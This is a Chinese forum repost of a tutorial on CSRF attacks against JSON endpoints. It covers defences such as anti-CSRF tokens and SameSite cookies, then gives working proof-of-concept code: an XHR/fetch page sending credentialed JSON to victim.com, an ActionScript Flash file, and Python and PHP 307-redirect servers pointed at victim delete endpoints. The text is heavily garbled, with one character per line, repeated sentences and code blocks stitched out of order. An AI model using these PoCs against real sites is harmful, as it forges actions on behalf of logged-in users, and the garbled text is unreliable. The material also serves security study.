论坛
BBS
空间测绘
发表
发布文章
提问答疑
搜索
您还未登录
登录后即可体验更多功能
立即登录
我的收藏
提问答疑
我要投稿
Web安全
[14281] 2019-06-27_谈谈Json格式下的CSRF攻击
文档创建者:
s7ckTeam
浏览次数:
2
最后更新:
2025-01-18
Web安全
2 人阅读
|
0 人回复
s7ckTeam
s7ckTeam
当前离线
积分
-56
6万
主题
-6万
回帖
-56
积分
管理员
积分
-56
发消息
2019-06-27_谈谈Json格式下的CSRF攻击
谈
谈
J
s
o
n
格
式
下
的
C
S
R
F
攻
击
s
h
y
s
t
a
r
t
r
e
e
F
r
e
e
B
u
f
2
0
1
9
-
0
6
-
2
7
一
、
一
、
C
S
R
F
漏
洞
简
介
漏
洞
简
介
c
s
r
f
漏
洞
的
成
因
就
是
网
站
的
漏
洞
的
成
因
就
是
网
站
的
c
o
o
k
i
e
在
浏
览
器
中
不
会
过
期
,
只
要
不
关
闭
浏
览
器
或
者
退
出
登
录
,
那
以
后
只
要
是
访
问
这
个
网
站
,
都
会
默
认
你
已
经
登
录
的
状
态
。
而
在
这
个
期
间
,
攻
击
者
发
送
了
构
在
浏
览
器
中
不
会
过
期
,
只
要
不
关
闭
浏
览
器
或
者
退
出
登
录
,
那
以
后
只
要
是
访
问
这
个
网
站
,
都
会
默
认
你
已
经
登
录
的
状
态
。
而
在
这
个
期
间
,
攻
击
者
发
送
了
构
造
好
的
造
好
的
c
s
r
f
脚
本
或
包
含
脚
本
或
包
含
c
s
r
f
脚
本
的
链
接
,
可
能
会
执
行
一
些
用
户
不
想
做
的
功
能
(
比
如
是
添
加
账
号
等
)
。
这
个
操
作
不
是
用
户
真
正
想
要
执
行
的
。
脚
本
的
链
接
,
可
能
会
执
行
一
些
用
户
不
想
做
的
功
能
(
比
如
是
添
加
账
号
等
)
。
这
个
操
作
不
是
用
户
真
正
想
要
执
行
的
。
在
p
o
s
t
标
准
化
格
式
(
a
c
c
o
u
n
t
s
=
t
e
s
t
&
p
a
s
s
w
o
r
d
=
a
a
a
)
的
表
单
页
面
中
,
在
没
有
c
s
r
f
防
护
的
前
提
下
,
我
们
能
很
轻
松
地
构
造
页
面
来
实
现
攻
击
,
但
是
在
j
s
o
n
格
式
下
,
c
s
r
f
攻
击
怎
么
实
现
呢
?
那
我
们
为
何
不
能
使
用
这
个
常
规
构
造
的
P
o
C
来
利
用
J
S
O
N
端
点
中
的
C
S
R
F
呢
?
原
因
如
下
:
1
、
P
O
S
T
b
o
d
y
需
要
以
J
S
O
N
格
式
发
送
,
而
这
种
格
式
如
果
用
H
T
M
L
表
单
元
素
来
构
建
的
话
会
比
较
麻
烦
。
2
、
C
o
n
t
e
n
t
-
T
y
p
e
头
需
要
设
置
为
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
。
设
置
自
定
义
H
e
a
d
e
r
需
要
使
用
X
M
L
H
t
t
p
R
e
q
u
e
s
t
s
,
而
它
还
会
向
服
务
器
端
发
送
O
P
T
I
O
N
S
预
检
请
求
。
1
.
1
防
御
方
案
防
御
方
案
关
于
防
御
方
案
,
一
般
有
如
下
几
种
:
1
)
用
户
操
作
验
证
,
在
提
交
数
据
时
需
要
输
入
验
证
码
2
)
请
求
来
源
验
证
,
验
证
请
求
来
源
的
r
e
f
e
r
e
r
3
)
表
单
t
o
k
e
n
验
证
现
在
业
界
对
C
S
R
F
的
防
御
,
一
致
的
做
法
是
使
用
一
个
T
o
k
e
n
(
A
n
t
i
C
S
R
F
T
o
k
e
n
)
。
这
个
T
o
k
e
n
的
值
必
须
是
随
机
的
,
不
可
预
测
的
。
由
于
T
o
k
e
n
的
存
在
,
攻
击
者
无
法
再
构
造
一
个
带
有
合
法
T
o
k
e
n
的
请
求
实
施
C
S
R
F
攻
击
。
另
外
使
用
T
o
k
e
n
时
应
注
意
T
o
k
e
n
的
保
密
性
,
尽
量
把
敏
感
操
作
由
G
E
T
改
为
P
O
S
T
,
以
f
o
r
m
或
A
J
A
X
形
式
提
交
,
避
免
T
o
k
e
n
泄
露
。
例
子
:
第
一
步
:
用
户
访
问
某
个
表
单
页
面
。
第
二
步
:
服
务
端
生
成
一
个
T
o
k
e
n
,
放
在
用
户
的
S
e
s
s
i
o
n
中
,
或
者
浏
览
器
的
C
o
o
k
i
e
中
。
第
三
步
:
在
页
面
表
单
附
带
上
T
o
k
e
n
参
数
。
第
四
步
:
用
户
提
交
请
求
后
,
服
务
端
验
证
表
单
中
的
T
o
k
e
n
是
否
与
用
户
S
e
s
s
i
o
n
(
或
C
o
o
k
i
e
s
)
中
的
T
o
k
e
n
一
致
,
一
致
为
合
法
请
求
,
不
是
则
非
法
请
求
。
4
)
在
前
后
端
分
离
的
前
提
下
(
例
如
使
用
a
j
a
x
提
交
数
据
)
设
置
不
了
t
o
k
e
n
,
可
以
给
c
o
o
k
i
e
新
增
S
a
m
e
S
i
t
e
属
性
,
通
过
这
个
属
性
可
以
标
记
哪
个
c
o
o
k
i
e
只
作
为
同
站
c
o
o
k
i
e
(
即
第
一
方
c
o
o
k
i
e
,
不
能
作
为
第
三
方
c
o
o
k
i
e
)
,
既
然
不
能
作
为
第
三
方
c
o
o
k
i
e
,
那
么
别
的
网
站
发
起
第
三
方
请
求
时
,
第
三
方
网
站
是
收
不
到
这
个
被
标
记
关
键
c
o
o
k
i
e
,
后
面
的
鉴
权
处
理
就
好
办
了
。
这
一
切
都
不
需
要
做
t
o
k
e
n
生
命
周
期
的
管
理
,
也
不
用
担
心
R
e
f
e
r
e
r
会
丢
失
或
被
中
途
被
篡
改
。
S
a
m
e
S
t
i
e
有
两
个
值
:
S
t
r
i
c
t
和
L
a
x
:
S
a
m
e
S
i
t
e
=
S
t
r
i
c
t
严
格
模
式
,
使
用
S
a
m
e
S
i
t
e
=
S
t
r
i
c
t
标
记
的
c
o
o
k
i
e
在
任
何
情
况
下
(
包
括
异
步
请
求
和
同
步
请
求
)
,
都
不
能
作
为
第
三
方
c
o
o
k
i
e
。
S
a
m
e
S
i
t
e
=
L
a
x
宽
松
模
式
,
使
用
S
a
m
e
S
i
t
e
=
L
a
x
标
记
的
c
o
o
k
i
e
在
异
步
请
求
和
f
o
r
m
提
交
跳
转
的
情
况
下
,
都
不
能
作
为
第
三
方
c
o
o
k
i
e
。
那
么
S
t
r
i
c
t
和
L
a
x
的
如
何
使
用
呢
?
登
录
态
关
键
的
c
o
o
k
i
e
都
可
以
设
置
为
S
t
r
i
c
t
。
后
台
根
据
用
户
的
登
录
态
动
态
新
建
一
个
可
以
用
于
校
验
登
录
态
的
c
o
o
k
i
e
,
设
置
为
L
a
x
,
这
样
的
话
对
外
推
广
比
如
微
博
什
么
的
,
你
希
望
用
户
在
微
博
上
打
开
你
的
链
接
还
能
保
持
登
录
态
。
如
果
你
的
页
面
有
可
能
被
第
三
方
网
站
去
i
f
r
a
m
e
或
有
接
口
需
要
做
j
s
o
n
p
,
那
么
都
不
能
设
置
S
t
r
i
c
t
或
L
a
x
。
二
、
不
验
证
二
、
不
验
证
C
O
N
T
E
N
T
-
T
Y
P
E
的
情
况
的
情
况
如
果
服
务
端
没
有
校
验
C
o
n
t
e
n
t
-
T
y
p
e
,
或
者
没
有
严
格
校
验
C
o
n
t
e
n
t
-
T
y
p
e
是
否
为
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
,
我
们
可
以
使
用
X
H
R
来
实
现
c
s
r
f
,
p
o
c
如
下
:
<
h
t
m
l
>
<
h
e
a
d
>
<
s
c
r
i
p
t
s
t
y
l
e
=
"
t
e
x
t
/
j
a
v
a
s
c
r
i
p
t
"
>
f
u
n
c
t
i
o
n
s
u
b
m
i
t
R
e
q
u
e
s
t
(
)
{
v
a
r
x
h
r
=
n
e
w
X
M
L
H
t
t
p
R
e
q
u
e
s
t
(
)
;
x
h
r
.
o
p
e
n
(
"
P
O
S
T
"
,
"
h
t
t
p
:
/
/
v
i
c
t
i
m
.
c
o
m
/
c
a
r
r
i
e
r
a
d
m
i
n
/
a
d
m
i
n
/
p
r
i
c
e
S
h
e
e
t
/
p
r
i
c
e
S
h
e
e
t
/
s
a
v
e
P
r
i
c
e
S
h
e
e
t
.
d
o
"
,
t
r
u
e
)
;
x
h
r
.
s
e
t
R
e
q
u
e
s
t
H
e
a
d
e
r
(
"
A
c
c
e
p
t
"
,
"
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
,
t
e
x
t
/
p
l
a
i
n
,
*
/
*
"
)
;
x
h
r
.
s
e
t
R
e
q
u
e
s
t
H
e
a
d
e
r
(
"
A
c
c
e
p
t
-
L
a
n
g
u
a
g
e
"
,
"
z
h
-
C
N
,
z
h
;
q
=
0
.
8
,
e
n
-
U
S
;
q
=
0
.
5
,
e
n
;
q
=
0
.
3
"
)
;
x
h
r
.
s
e
t
R
e
q
u
e
s
t
H
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
T
y
p
e
"
,
"
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
;
c
h
a
r
s
e
t
=
u
t
f
-
8
"
)
;
x
h
r
.
w
i
t
h
C
r
e
d
e
n
t
i
a
l
s
=
t
r
u
e
;
x
h
r
.
s
e
n
d
(
J
S
O
N
.
s
t
r
i
n
g
i
f
y
(
{
"
s
e
r
i
a
l
N
u
m
b
e
r
"
:
"
C
Y
S
1
8
1
1
2
9
1
8
9
9
"
,
"
t
y
p
e
"
:
2
,
"
t
e
m
p
"
:
1
,
"
e
n
a
b
l
e
T
i
m
e
"
:
"
2
0
1
8
-
1
1
-
0
1
0
0
:
0
0
:
0
0
"
,
"
d
i
s
a
b
l
e
T
i
m
e
"
:
"
2
0
1
8
-
1
1
-
2
9
1
2
:
0
0
:
0
0
"
,
"
n
a
m
e
"
:
"
1
"
,
"
s
u
p
p
l
i
e
r
C
o
d
e
"
}
<
/
s
c
r
i
p
t
>
<
/
h
e
a
d
>
<
b
o
d
y
>
<
f
o
r
m
a
c
t
i
o
n
=
"
#
"
>
<
i
n
p
u
t
t
y
p
e
=
"
b
u
t
t
o
n
"
v
a
l
u
e
=
"
S
u
b
m
i
t
r
e
q
u
e
s
t
"
o
n
C
l
i
c
k
=
"
s
u
b
m
i
t
R
e
q
u
e
s
t
(
)
"
/
>
<
/
f
o
r
m
>
<
/
b
o
d
y
>
<
/
h
t
m
l
>
三
、
验
证
三
、
验
证
C
O
N
T
E
N
T
-
T
Y
P
E
的
情
况
的
情
况
当
然
了
,
使
用
X
M
L
H
t
t
p
R
e
q
u
e
s
t
、
f
e
t
c
h
能
构
造
出
J
S
O
N
请
求
,
并
且
能
设
置
C
o
n
t
e
n
t
-
T
y
p
e
,
但
是
无
法
跨
域
。
f
e
t
c
h
发
起
的
请
求
代
码
:
我
们
可
以
利
用
F
l
a
s
h
的
跨
域
与
3
0
7
跳
转
来
绕
过
h
t
t
p
自
定
义
头
限
制
,
3
0
7
跟
其
他
3
X
X
H
T
T
P
状
态
码
之
间
的
区
别
就
在
于
,
H
T
T
P
3
0
7
可
以
确
保
重
定
向
请
求
发
送
之
后
,
请
求
方
法
和
请
求
主
体
不
会
发
生
任
何
改
变
。
H
T
T
P
3
0
7
会
将
P
O
S
T
b
o
d
y
和
H
T
T
P
头
重
定
向
到
我
们
所
指
定
的
最
终
U
R
L
,
并
完
成
攻
击
。
3
.
1
创
建
创
建
f
l
a
s
h
文
件
文
件
为
了
创
建
能
够
发
送
W
e
b
请
求
的
c
s
r
f
.
s
w
f
文
件
,
我
们
需
要
按
照
以
下
步
骤
操
作
:
安
装
F
l
e
x
S
D
K
将
A
c
t
i
o
n
S
c
r
i
p
t
编
译
为
s
w
f
文
件
。
F
l
e
x
需
要
安
装
3
2
位
的
J
V
M
,
这
一
步
可
以
安
装
3
2
位
J
D
K
来
完
成
。
创
建
一
个
包
含
下
列
A
c
t
i
o
n
S
c
r
i
p
t
代
码
的
t
e
x
t
文
件
,
文
件
名
为
c
s
r
f
.
a
s
。
获
取
托
管
F
l
a
s
h
文
件
的
主
机
系
统
(
攻
击
者
的
服
务
器
)
I
P
地
址
/
域
名
,
并
替
换
掉
代
码
中
的
。
运
行
“
m
x
m
l
c
c
s
r
f
.
a
s
”
命
令
,
将
该
文
件
编
译
为
c
s
r
f
.
s
w
f
。
3
.
2
创
建
创
建
w
e
b
服
务
器
服
务
器
1
、
使
用
p
y
t
h
o
n
作
为
服
务
器
(
此
方
法
不
推
荐
)
:
先
创
建
a
s
文
件
,
用
上
述
步
骤
编
译
:
借
助
G
i
t
H
u
b
上
的
j
s
o
n
-
f
l
a
s
h
-
c
s
r
f
-
p
o
c
,
我
们
可
以
生
成
一
个
简
单
的
p
y
t
h
o
n
w
e
b
服
务
器
p
y
s
e
r
v
e
r
.
p
y
:
<
h
t
m
l
>
<
t
i
t
l
e
>
J
S
O
N
C
S
R
F
P
O
C
<
/
t
i
t
l
e
>
<
s
c
r
i
p
t
>
f
e
t
c
h
(
'
h
t
t
p
:
/
/
v
i
c
t
i
m
.
c
o
m
/
v
u
l
.
p
a
g
e
'
,
{
m
e
t
h
o
d
:
'
P
O
S
T
'
,
c
r
e
d
e
n
t
i
a
l
s
:
'
i
n
c
l
u
d
e
'
,
h
e
a
d
e
r
s
:
{
'
C
o
n
t
e
n
t
-
T
y
p
e
'
:
'
t
e
x
t
/
p
l
a
i
n
'
}
,
b
o
d
y
:
'
{
"
n
a
m
e
"
:
"
a
t
t
a
c
k
e
r
"
,
"
e
m
a
i
l
"
:
"
a
t
t
a
c
k
e
r
.
c
o
m
"
}
'
}
)
;
<
/
s
c
r
i
p
t
>
<
/
f
o
r
m
>
<
/
h
t
m
l
>
p
a
c
k
a
g
e
{
i
m
p
o
r
t
f
l
a
s
h
.
d
i
s
p
l
a
y
.
S
p
r
i
t
e
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
L
o
a
d
e
r
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
R
e
q
u
e
s
t
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
R
e
q
u
e
s
t
H
e
a
d
e
r
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
R
e
q
u
e
s
t
M
e
t
h
o
d
;
p
u
b
l
i
c
c
l
a
s
s
c
s
r
f
e
x
t
e
n
d
s
S
p
r
i
t
e
{
p
u
b
l
i
c
f
u
n
c
t
i
o
n
c
s
r
f
(
)
{
s
u
p
e
r
(
)
;
v
a
r
m
e
m
b
e
r
1
:
O
b
j
e
c
t
=
n
u
l
l
;
v
a
r
m
y
J
s
o
n
:
S
t
r
i
n
g
=
n
u
l
l
;
m
e
m
b
e
r
1
=
n
e
w
O
b
j
e
c
t
(
)
;
m
e
m
b
e
r
1
=
{
"
i
d
"
:
1
0
2
}
;
v
a
r
m
y
D
a
t
a
:
O
b
j
e
c
t
=
m
e
m
b
e
r
1
;
m
y
J
s
o
n
=
J
S
O
N
.
s
t
r
i
n
g
i
f
y
(
m
y
D
a
t
a
)
;
m
y
J
s
o
n
=
J
S
O
N
.
s
t
r
i
n
g
i
f
y
(
m
y
D
a
t
a
)
;
v
a
r
u
r
l
:
S
t
r
i
n
g
=
"
h
t
t
p
:
/
/
1
7
2
.
1
6
.
1
1
.
1
1
0
:
8
0
0
0
/
"
;
v
a
r
r
e
q
u
e
s
t
:
U
R
L
R
e
q
u
e
s
t
=
n
e
w
U
R
L
R
e
q
u
e
s
t
(
u
r
l
)
;
r
e
q
u
e
s
t
.
r
e
q
u
e
s
t
H
e
a
d
e
r
s
.
p
u
s
h
(
n
e
w
U
R
L
R
e
q
u
e
s
t
H
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
T
y
p
e
"
,
"
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
"
)
)
;
r
e
q
u
e
s
t
.
d
a
t
a
=
m
y
J
s
o
n
;
r
e
q
u
e
s
t
.
m
e
t
h
o
d
=
U
R
L
R
e
q
u
e
s
t
M
e
t
h
o
d
.
P
O
S
T
;
v
a
r
u
r
l
L
o
a
d
e
r
:
U
R
L
L
o
a
d
e
r
=
n
e
w
U
R
L
L
o
a
d
e
r
(
)
;
t
r
y
{
u
r
l
L
o
a
d
e
r
.
l
o
a
d
(
r
e
q
u
e
s
t
)
;
r
e
t
u
r
n
;
}
c
a
t
c
h
(
e
:
E
r
r
o
r
)
{
t
r
a
c
e
(
e
)
;
r
e
t
u
r
n
;
}
}
}
}
i
m
p
o
r
t
B
a
s
e
H
T
T
P
S
e
r
v
e
r
i
m
p
o
r
t
t
i
m
e
i
m
p
o
r
t
s
y
s
H
O
S
T
=
'
'
P
O
R
T
=
8
0
0
0
2
、
使
用
a
p
a
c
h
e
的
p
h
p
页
面
作
为
服
务
端
(
首
选
方
法
)
:
我
们
也
可
以
使
用
p
h
p
来
作
为
3
0
7
跳
转
的
服
务
端
,
参
考
G
i
t
H
u
b
上
的
s
w
f
_
j
s
o
n
_
c
s
r
f
。
c
s
r
f
.
a
s
:
3
0
7
.
p
h
p
:
最
后
使
用
的
p
o
c
是
:
四
、
更
进
一
步
探
索
四
、
更
进
一
步
探
索
c
l
a
s
s
R
e
d
i
r
e
c
t
H
a
n
d
l
e
r
(
B
a
s
e
H
T
T
P
S
e
r
v
e
r
.
B
a
s
e
H
T
T
P
R
e
q
u
e
s
t
H
a
n
d
l
e
r
)
:
d
e
f
d
o
_
P
O
S
T
(
s
)
:
#
d
i
r
(
s
)
i
f
s
.
p
a
t
h
=
=
'
/
c
s
r
f
.
s
w
f
'
:
s
.
s
e
n
d
_
r
e
s
p
o
n
s
e
(
2
0
0
)
s
.
s
e
n
d
_
h
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
T
y
p
e
"
,
"
a
p
p
l
i
c
a
t
i
o
n
/
x
-
s
h
o
c
k
w
a
v
e
-
f
l
a
s
h
"
)
s
.
e
n
d
_
h
e
a
d
e
r
s
(
)
s
.
w
f
i
l
e
.
w
r
i
t
e
(
o
p
e
n
(
"
c
s
r
f
.
s
w
f
"
,
"
r
b
"
)
.
r
e
a
d
(
)
)
r
e
t
u
r
n
s
.
s
e
n
d
_
r
e
s
p
o
n
s
e
(
3
0
7
)
s
.
s
e
n
d
_
h
e
a
d
e
r
(
"
L
o
c
a
t
i
o
n
"
,
"
h
t
t
p
s
:
/
/
v
i
c
t
i
m
-
s
i
t
e
/
u
s
e
r
d
e
l
e
t
e
"
)
s
.
e
n
d
_
h
e
a
d
e
r
s
(
)
d
e
f
d
o
_
G
E
T
(
s
)
:
p
r
i
n
t
(
s
.
p
a
t
h
)
s
.
d
o
_
P
O
S
T
(
)
i
f
_
_
n
a
m
e
_
_
=
=
'
_
_
m
a
i
n
_
_
'
:
s
e
r
v
e
r
_
c
l
a
s
s
=
B
a
s
e
H
T
T
P
S
e
r
v
e
r
.
H
T
T
P
S
e
r
v
e
r
h
t
t
p
d
=
s
e
r
v
e
r
_
c
l
a
s
s
(
(
H
O
S
T
,
P
O
R
T
)
,
R
e
d
i
r
e
c
t
H
a
n
d
l
e
r
)
p
r
i
n
t
t
i
m
e
.
a
s
c
t
i
m
e
(
)
,
"
S
e
r
v
e
r
S
t
a
r
t
s
-
%
s
:
%
s
"
%
(
H
O
S
T
,
P
O
R
T
)
t
r
y
:
h
t
t
p
d
.
s
e
r
v
e
_
f
o
r
e
v
e
r
(
)
e
x
c
e
p
t
K
e
y
b
o
a
r
d
I
n
t
e
r
r
u
p
t
:
p
a
s
s
h
t
t
p
d
.
s
e
r
v
e
r
_
c
l
o
s
e
(
)
p
r
i
n
t
t
i
m
e
.
a
s
c
t
i
m
e
(
)
,
"
S
e
r
v
e
r
S
t
o
p
s
-
%
s
:
%
s
"
%
(
H
O
S
T
,
P
O
R
T
)
p
a
c
k
a
g
e
{
i
m
p
o
r
t
f
l
a
s
h
.
d
i
s
p
l
a
y
.
S
p
r
i
t
e
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
L
o
a
d
e
r
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
R
e
q
u
e
s
t
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
R
e
q
u
e
s
t
H
e
a
d
e
r
;
i
m
p
o
r
t
f
l
a
s
h
.
n
e
t
.
U
R
L
R
e
q
u
e
s
t
M
e
t
h
o
d
;
p
u
b
l
i
c
c
l
a
s
s
c
s
r
f
e
x
t
e
n
d
s
S
p
r
i
t
e
{
p
u
b
l
i
c
f
u
n
c
t
i
o
n
c
s
r
f
(
)
{
s
u
p
e
r
(
)
;
v
a
r
m
y
J
s
o
n
:
S
t
r
i
n
g
=
t
h
i
s
.
r
o
o
t
.
l
o
a
d
e
r
I
n
f
o
.
p
a
r
a
m
e
t
e
r
s
.
j
s
o
n
D
a
t
a
;
v
a
r
u
r
l
:
S
t
r
i
n
g
=
t
h
i
s
.
r
o
o
t
.
l
o
a
d
e
r
I
n
f
o
.
p
a
r
a
m
e
t
e
r
s
.
p
h
p
_
u
r
l
;
v
a
r
e
n
d
p
o
i
n
t
:
S
t
r
i
n
g
=
t
h
i
s
.
r
o
o
t
.
l
o
a
d
e
r
I
n
f
o
.
p
a
r
a
m
e
t
e
r
s
.
e
n
d
p
o
i
n
t
;
v
a
r
c
t
:
S
t
r
i
n
g
=
!
!
t
h
i
s
.
r
o
o
t
.
l
o
a
d
e
r
I
n
f
o
.
p
a
r
a
m
e
t
e
r
s
.
c
t
?
t
h
i
s
.
r
o
o
t
.
l
o
a
d
e
r
I
n
f
o
.
p
a
r
a
m
e
t
e
r
s
.
c
t
:
"
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
"
;
v
a
r
r
e
q
u
e
s
t
:
U
R
L
R
e
q
u
e
s
t
=
n
e
w
U
R
L
R
e
q
u
e
s
t
(
u
r
l
+
"
?
e
n
d
p
o
i
n
t
=
"
+
e
n
d
p
o
i
n
t
)
;
r
e
q
u
e
s
t
.
r
e
q
u
e
s
t
H
e
a
d
e
r
s
.
p
u
s
h
(
n
e
w
U
R
L
R
e
q
u
e
s
t
H
e
a
d
e
r
(
"
C
o
n
t
e
n
t
-
T
y
p
e
"
,
c
t
)
)
;
r
e
q
u
e
s
t
.
d
a
t
a
=
m
y
J
s
o
n
;
r
e
q
u
e
s
t
.
m
e
t
h
o
d
=
U
R
L
R
e
q
u
e
s
t
M
e
t
h
o
d
.
P
O
S
T
;
v
a
r
u
r
l
L
o
a
d
e
r
:
U
R
L
L
o
a
d
e
r
=
n
e
w
U
R
L
L
o
a
d
e
r
(
)
;
t
r
y
{
u
r
l
L
o
a
d
e
r
.
l
o
a
d
(
r
e
q
u
e
s
t
)
;
r
e
t
u
r
n
;
}
c
a
t
c
h
(
e
:
E
r
r
o
r
)
{
t
r
a
c
e
(
e
)
;
r
e
t
u
r
n
;
}
}
}
}
<
?
p
h
p
$
v
i
c
t
i
m
_
u
r
l
=
$
_
G
E
T
[
'
e
n
d
p
o
i
n
t
'
]
;
h
e
a
d
e
r
(
"
L
o
c
a
t
i
o
n
:
$
v
i
c
t
i
m
_
u
r
l
"
,
t
r
u
e
,
3
0
7
)
?
>
h
t
t
p
:
/
/
1
7
2
.
1
6
.
1
1
.
1
0
2
/
c
s
r
f
/
t
e
s
t
.
s
w
f
?
j
s
o
n
D
a
t
a
=
{
%
2
2
i
d
%
2
2
:
4
9
}
&
p
h
p
_
u
r
l
=
h
t
t
p
:
/
/
1
7
2
.
1
6
.
1
1
.
1
0
2
/
c
s
r
f
/
t
e
s
t
.
p
h
p
&
e
n
d
p
o
i
n
t
=
h
t
t
p
:
/
/
v
i
c
t
i
m
.
c
o
m
/
c
a
r
r
i
e
r
a
d
m
i
n
/
a
d
m
i
n
/
c
a
r
/
d
e
l
e
t
e
&
c
t
=
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
当
访
问
最
后
的
P
O
C
,
过
程
如
下
:
1
、
受
害
者
访
问
P
O
C
,
向
a
t
t
a
c
t
e
r
.
c
o
m
发
起
一
条
s
w
f
请
求
,
s
w
f
向
3
0
7
.
p
h
p
发
送
H
T
T
P
P
O
S
T
请
求
。
2
、
a
t
t
a
c
t
e
r
.
c
o
m
的
3
0
7
.
p
h
p
发
起
3
0
7
跳
转
,
跳
转
到
v
i
c
t
i
m
.
c
o
m
,
注
意
3
0
7
跳
转
会
带
着
h
t
t
p
请
求
方
式
,
h
e
a
d
e
r
和
p
o
s
t
d
a
t
a
进
行
跳
转
。
3
、
v
i
c
t
i
m
.
c
o
m
收
到
一
条
P
O
S
T
请
求
,
并
且
C
o
n
t
e
n
t
-
T
y
p
e
为
a
p
p
l
i
c
a
t
i
o
n
/
j
s
o
n
。
4
、
v
i
c
t
i
m
.
c
o
m
收
到
一
条
/
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
请
求
。
由
于
第
三
步
优
先
第
四
步
执
行
,
导
致
跨
域
。
并
且
v
i
c
t
i
m
.
c
o
m
能
收
到
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
请
求
,
也
证
明
了
第
三
步
的
P
O
S
T
请
求
是
F
l
a
s
h
发
出
,
而
不
是
3
0
7
.
p
h
p
发
出
。
因
为
3
0
7
.
p
h
p
单
独
发
出
的
p
o
s
t
请
求
不
会
主
动
请
求
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
。
我
们
知
道
,
服
务
器
A
的
F
l
a
s
h
如
果
要
向
B
发
起
一
条
H
T
T
P
请
求
,
会
先
请
求
服
务
器
B
的
c
r
o
s
s
d
o
m
a
i
n
.
x
m
l
文
件
,
判
断
是
否
能
跨
域
,
如
果
文
件
没
有
,
或
者
x
m
l
文
件
设
置
不
能
跨
域
,
则
不
能
跨
域
。
既
然
可
以
设
置
C
o
n
t
e
n
t
-
T
y
p
e
,
那
么
能
设
置
R
e
f
e
r
e
r
吗
。
如
果
能
,
那
验
证
R
e
f
e
r
e
r
的
C
S
R
F
岂
不
都
能
绕
过
?
其
实
F
l
a
s
h
的
H
e
a
d
e
r
存
在
一
个
黑
名
单
,
黑
名
单
列
表
的
头
不
允
许
设
置
,
其
中
就
有
R
e
f
e
r
e
r
。
不
能
设
置
的
头
标
如
下
:
A
c
c
e
p
t
-
C
h
a
r
s
e
t
、
A
c
c
e
p
t
-
E
n
c
o
d
i
n
g
、
A
c
c
e
p
t
-
R
a
n
g
e
s
、
A
g
e
、
A
l
l
o
w
、
A
l
l
o
w
e
d
、
A
u
t
h
o
r
i
z
a
t
i
o
n
、
C
h
a
r
g
e
-
T
o
、
C
o
n
n
e
c
t
、
C
o
n
n
e
c
t
i
o
n
、
C
o
n
t
e
n
t
-
L
e
n
g
t
h
、
C
o
n
t
e
n
t
-
L
o
c
a
t
i
o
n
、
C
o
n
t
e
n
t
-
R
a
n
g
e
、
C
o
o
k
i
e
、
D
a
t
e
、
D
e
l
e
t
e
、
E
T
a
g
、
E
x
p
e
c
t
、
G
e
t
、
H
e
a
d
、
H
o
s
t
、
K
e
e
p
-
A
l
i
v
e
、
L
a
s
t
-
M
o
d
i
f
i
e
d
、
L
o
c
a
t
i
o
n
、
M
a
x
-
F
o
r
w
a
r
d
s
、
O
p
t
i
o
n
s
、
P
o
s
t
、
P
r
o
x
y
-
A
u
t
h
e
n
t
i
c
a
t
e
、
P
r
o
x
y
-
A
u
t
h
o
r
i
z
a
t
i
o
n
、
P
r
o
x
y
-
C
o
n
n
e
c
t
i
o
n
、
P
u
b
l
i
c
、
P
u
t
、
R
a
n
g
e
、
R
e
f
e
r
e
r
、
R
e
q
u
e
s
t
-
R
a
n
g
e
、
R
e
t
r
y
-
A
f
t
e
r
、
S
e
r
v
e
r
、
T
E
、
T
r
a
c
e
、
T
r
a
i
l
e
r
、
T
r
a
n
s
f
e
r
-
E
n
c
o
d
i
n
g
、
U
p
g
r
a
d
e
、
U
R
I
、
U
s
e
r
-
A
g
e
n
t
、
V
a
r
y
、
V
i
a
、
W
a
r
n
i
n
g
、
W
W
W
-
A
u
t
h
e
n
t
i
c
a
t
e
和
x
-
f
l
a
s
h
-
v
e
r
s
i
o
n
。
五
、
实
际
测
试
效
果
五
、
实
际
测
试
效
果
这
种
f
l
a
s
h
+
3
0
7
跳
转
攻
击
方
法
只
能
在
旧
版
浏
览
器
适
用
,
在
2
0
1
8
年
后
更
新
版
本
的
几
乎
所
有
浏
览
器
,
3
0
7
跳
转
的
时
候
并
没
有
把
C
o
n
t
e
n
t
-
T
y
p
e
传
过
去
而
导
致
c
s
r
f
攻
击
失
败
。
所
以
还
望
寻
找
一
种
新
的
攻
击
方
法
,
本
文
的
j
s
o
n
c
s
r
f
攻
击
方
法
仅
仅
是
作
为
一
种
记
录
,
在
某
些
情
况
下
还
是
能
用
到
的
。
参
考
链
接
参
考
链
接
E
x
p
l
o
i
t
i
n
g
J
S
O
N
C
S
R
F
如
何
在
J
S
O
N
端
点
上
利
用
C
S
R
F
漏
洞
*
本
文
作
者
:
s
h
y
s
t
a
r
t
r
e
e
,
本
文
属
F
r
e
e
B
u
f
原
创
奖
励
计
划
,
未
经
许
可
禁
止
转
载
。
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
Web安全